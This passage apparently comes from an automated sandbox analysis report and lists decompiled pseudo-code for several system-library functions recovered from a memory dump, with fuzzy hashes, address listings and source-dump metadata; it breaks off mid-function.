            • Instruction ID: d6b3eca70b796e8ee3aba9cc34af7f354baab9581c230f4fcc1a0e2df17c4730
            • Opcode Fuzzy Hash: eb85aba47f4fbbf0eca94ff18bcb6e0162f4ccf3f1b0fb032e50e8ecc805565a
            • Instruction Fuzzy Hash: 3A317CB1B002949FFF25EF6AC6887AEB7B1BB48354F58854BC40467351C375B980CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04440050, Relevance: .1, Instructions: 81COMMON
            Download Yara Rule
            C-Code - Quality: 53%
            			E04440050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x451d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04459ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0446B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E044F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04459702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x451b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















            0x04440055
            0x0444005d
            0x04440062
            0x0444006c
            0x0444006f
            0x04440074
            0x0444007a
            0x0444007a
            0x04440080
            0x04440080
            0x04440087
            0x0444008d
            0x0444008f
            0x04440093
            0x04440095
            0x0444009b
            0x044400f8
            0x044400fb
            0x044400fc
            0x044400ff
            0x04440108
            0x04440108
            0x044400a2
            0x044400a6
            0x044400b3
            0x044400bc
            0x044400c5
            0x044400ca
            0x0448c01e
            0x00000000
            0x00000000
            0x0448c02d
            0x044400d5
            0x044400d9
            0x0448c03d
            0x0448c046
            0x0448c046
            0x044400df
            0x044400e2
            0x044400ea
            0x044400ef
            0x044400f2
            0x044400f6
            0x04440111
            0x04440117
            0x04440117
            0x00000000
            0x044400f6
            0x044400d0
            0x044400d0
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c094c7cd9c1c0f6b3ddc2d75c1c0a769306d5ef4ac5685d35f02e244bc173e66
            • Instruction ID: 70c0ab6ea56e65977e89d6d5538ef82c7c9bcd87bdee69eb59c91d45caa5e260
            • Opcode Fuzzy Hash: c094c7cd9c1c0f6b3ddc2d75c1c0a769306d5ef4ac5685d35f02e244bc173e66
            • Instruction Fuzzy Hash: 65316B31601B04DFEB21CF28D840B5AB3E5FF89718F14856EE59687BA0EB75B801DB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044A6C0A, Relevance: .1, Instructions: 79COMMON
            Download Yara Rule
            C-Code - Quality: 77%
            			E044A6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04447D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4517b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04444620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0446F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04447D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04469AE0();
						_t23 = L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












            0x044a6c0a
            0x044a6c0f
            0x044a6c10
            0x044a6c13
            0x044a6c15
            0x044a6c19
            0x044a6c1c
            0x044a6c21
            0x044a6c28
            0x044a6c3a
            0x044a6c2a
            0x044a6c33
            0x044a6c33
            0x044a6c3f
            0x044a6c48
            0x044a6c4d
            0x044a6c60
            0x044a6c65
            0x044a6c69
            0x044a6c73
            0x044a6c79
            0x044a6c7f
            0x044a6c86
            0x044a6c90
            0x044a6c94
            0x044a6ca6
            0x044a6cb2
            0x044a6cbd
            0x044a6cbd
            0x044a6cc3
            0x044a6cc7
            0x044a6ccb
            0x044a6cd0
            0x044a6cd1
            0x044a6ce2
            0x044a6ce2
            0x044a6c69
            0x044a6ced

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9681cff171fabfe7266c056402f8e7a6b7d0e76c7cdbffc7e9222b0940b10f85
            • Instruction ID: 46ad2dc8e0154ad2909151154f40a61235f05ef633d7f44a033978ff84a81874
            • Opcode Fuzzy Hash: 9681cff171fabfe7266c056402f8e7a6b7d0e76c7cdbffc7e9222b0940b10f85
            • Instruction Fuzzy Hash: 11219AB1A00644ABEB11DF69D880E6AB7A8FF48704F08006AF945C7791EB34ED11CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044690AF, Relevance: .1, Instructions: 76COMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E044690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0447D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0445E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04444620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0446F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0445A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























            0x044690af
            0x044690b8
            0x044690bb
            0x044690bf
            0x044690c2
            0x044690c2
            0x044690c8
            0x044690cb
            0x044690cd
            0x044a14d7
            0x044a14eb
            0x044a14eb
            0x00000000
            0x044a14eb
            0x044a14db
            0x044a14e6
            0x00000000
            0x044a14f2
            0x044a14e8
            0x00000000
            0x044a14e8
            0x044690d8
            0x044690da
            0x044690dd
            0x044690e5
            0x00000000
            0x04469139
            0x044690fa
            0x044690fe
            0x04469142
            0x00000000
            0x04469142
            0x04469104
            0x04469107
            0x0446910b
            0x04469110
            0x04469118
            0x04469147
            0x04469148
            0x0446914f
            0x04469150
            0x04469151
            0x04469152
            0x04469156
            0x0446915d
            0x04469160
            0x04469168
            0x0446916c
            0x044691bc
            0x044691be
            0x00000000
            0x044691be
            0x0446916e
            0x04469173
            0x04469176
            0x00000000
            0x00000000
            0x0446917c
            0x04469180
            0x044691b5
            0x00000000
            0x044691b5
            0x04469182
            0x04469185
            0x04469189
            0x00000000
            0x00000000
            0x0446918e
            0x04469190
            0x04469198
            0x00000000
            0x00000000
            0x044691a0
            0x00000000
            0x044691ad
            0x044691ad
            0x044691b0
            0x044691b1
            0x00000000
            0x04469185
            0x0446911a
            0x0446911c
            0x0446911f
            0x04469125
            0x04469127
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
            • Instruction ID: c0a28da9cd9da6d65b9d2af252eb825362cd89b69413c0b3d0c2aac51fb20887
            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
            • Instruction Fuzzy Hash: A721AFB1A00204EFEF20DF59C844AAAF7F8EB54710F14886BE986A7200D270B9008F91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04453B7A, Relevance: .1, Instructions: 75COMMON
            Download Yara Rule
            C-Code - Quality: 59%
            			E04453B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x45184c4; // 0x0
				_v12 = 1;
				_v8 =  *0x45184c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x45184c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0446AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0446FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x45184c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x45184c4; // 0x0
					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












            0x04453b89
            0x04453b96
            0x04453ba1
            0x04453bab
            0x04453bb5
            0x04453bb9
            0x04496298
            0x04453bbf
            0x04453bc2
            0x04453bc3
            0x04453bc9
            0x04453bca
            0x04453bcc
            0x04453bcd
            0x04453bd4
            0x04453bd6
            0x04453bdb
            0x04453bea
            0x04453bf7
            0x04453bfb
            0x04453bff
            0x04453c09
            0x04453c0a
            0x04453c0b
            0x04453c0f
            0x04453c14
            0x04453c18
            0x04453c18
            0x04453bfb
            0x04453c1b
            0x04453c30
            0x04453c30
            0x04453c3d

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c5f3e65ff30ad0e86a28b4c4cd7caae7e6843cdb70a23892d4edd47d8bdda0a9
            • Instruction ID: 8c0b9856f72da4edf2b7582551865c623eb991b030032398ac17b085bb755203
            • Opcode Fuzzy Hash: c5f3e65ff30ad0e86a28b4c4cd7caae7e6843cdb70a23892d4edd47d8bdda0a9
            • Instruction Fuzzy Hash: CC21C272600104AFDB11DF58CD81B5AB7BDFB40348F150469E905AB262D775FD15DB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044A6CF0, Relevance: .1, Instructions: 74COMMON
            Download Yara Rule
            C-Code - Quality: 80%
            			E044A6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04447D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04447D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4405c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0445F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0445F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E044A7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04442400( &_v52);
								}
								_t21 = L04442400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















            0x044a6cfb
            0x044a6d00
            0x044a6d02
            0x044a6d06
            0x044a6d0a
            0x044a6d0e
            0x044a6d19
            0x044a6d2b
            0x044a6d1b
            0x044a6d24
            0x044a6d24
            0x044a6d33
            0x044a6d39
            0x044a6d46
            0x044a6d4f
            0x044a6d61
            0x044a6d51
            0x044a6d5a
            0x044a6d5a
            0x044a6d69
            0x044a6d6b
            0x044a6d6d
            0x044a6d6f
            0x044a6d6f
            0x044a6d74
            0x044a6d79
            0x044a6d7a
            0x044a6d7f
            0x044a6d82
            0x044a6d88
            0x044a6d89
            0x044a6d90
            0x044a6d94
            0x044a6da7
            0x044a6db1
            0x044a6db1
            0x044a6dbb
            0x044a6dbb
            0x044a6d90
            0x044a6d69
            0x044a6d46
            0x044a6dc6

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e748268cff9570ccbb9eb552a54e6b00c5c102473ef69f47471459b36ae6412d
            • Instruction ID: f44f938a3e55baef2cc0dbd10165d2468b222de6e763b96272d4954eb0f3a66d
            • Opcode Fuzzy Hash: e748268cff9570ccbb9eb552a54e6b00c5c102473ef69f47471459b36ae6412d
            • Instruction Fuzzy Hash: EF21F5725042449BEF21DF29C944B6BB7ECEF91784F09045BFD90C7262E734E519C6A2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F070D, Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            C-Code - Quality: 67%
            			E044F070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E044F07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E044EAFDE( &_v8,  &_v12);
					E044F1293(_t38, _v28, _t60);
					if(E04447D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E044E14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













            0x044f071b
            0x044f0724
            0x044f0734
            0x044f0738
            0x044f074b
            0x044f074b
            0x044f0753
            0x044f0753
            0x044f0759
            0x044f075d
            0x044f0774
            0x044f0779
            0x044f077d
            0x044f0789
            0x044f0795
            0x044f07a7
            0x044f0797
            0x044f07a0
            0x044f07a0
            0x044f07af
            0x044f07c4
            0x044f07cd
            0x044f07cd
            0x044f07af
            0x044f07dc

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
            • Instruction ID: 0a7619225c0bd0dce2fae2a71eccc0eea5653489305471cfa2b3a8357e0ae281
            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
            • Instruction Fuzzy Hash: 0B21F2362046009FDB15DF59CC80B6ABBE5EBC4350F04856EFA959B392D730E909CB92
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0444AE73, Relevance: .1, Instructions: 70COMMON
            Download Yara Rule
            C-Code - Quality: 96%
            			E0444AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04447D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04447D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04447D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04447D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E044A7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













            0x0444ae78
            0x0444ae7c
            0x0444ae7e
            0x0444ae81
            0x0444ae86
            0x0444ae8d
            0x04492691
            0x0444ae93
            0x0444ae93
            0x0444ae93
            0x0444ae98
            0x0444ae9d
            0x044926a2
            0x044926b4
            0x044926a4
            0x044926ad
            0x044926ad
            0x044926b9
            0x00000000
            0x044926bb
            0x00000000
            0x044926bb
            0x0444aea3
            0x0444aea3
            0x0444aea3
            0x0444aeaa
            0x044926c0
            0x044926c9
            0x044926c9
            0x0444aeb3
            0x044926d4
            0x044926e1
            0x00000000
            0x00000000
            0x044926e7
            0x044926ee
            0x044926f0
            0x044926f9
            0x044926f9
            0x04492702
            0x04492708
            0x04492708
            0x0449270b
            0x0449270f
            0x04492711
            0x04492711
            0x04492725
            0x04492725
            0x00000000
            0x0444aeb9
            0x0444aeb9
            0x0444aebf
            0x0444aebf
            0x0444aeb3

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
            • Instruction ID: 13c313136dd79b54d1585b4a70b067197d943277a2b136d5a3dddc6c53850f4c
            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
            • Instruction Fuzzy Hash: 7D21CF71641680AFFF21DB29C944B263BE8BB84340F1904E2DD049B792E774FC41D690
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044A7794, Relevance: .1, Instructions: 70COMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E044A7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4517b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0446F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04447D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04469AE0();
					_t24 = L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













            0x044a7799
            0x044a779a
            0x044a779b
            0x044a77a3
            0x044a77ab
            0x044a77ae
            0x044a77b1
            0x044a77b1
            0x044a77bf
            0x044a77c4
            0x044a77c8
            0x044a77ce
            0x044a77d4
            0x044a77e0
            0x044a77e0
            0x044a77d6
            0x044a77d6
            0x044a77de
            0x00000000
            0x00000000
            0x044a77de
            0x044a77e5
            0x044a77f0
            0x044a77f3
            0x044a77f6
            0x044a77fd
            0x044a7800
            0x044a780c
            0x044a7818
            0x044a782b
            0x044a781a
            0x044a7823
            0x044a7823
            0x044a7830
            0x044a7831
            0x044a7838
            0x044a783d
            0x044a783e
            0x044a784f
            0x044a784f
            0x044a785a

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9f06c06d53b82b73ee354e8d6b8808fadff42ea9b6a5ee7ad44cf5c49193acb7
            • Instruction ID: e4cb6d6e6c5365584ce419b9eb2bb34662492f55ead1b8104a3786d00bf6ac34
            • Opcode Fuzzy Hash: 9f06c06d53b82b73ee354e8d6b8808fadff42ea9b6a5ee7ad44cf5c49193acb7
            • Instruction Fuzzy Hash: 5721A172500604ABDB25DF69D880E6BB7A9EF88740F10056EF50AC7750E734F910CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445FD9B, Relevance: .1, Instructions: 69COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0445FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
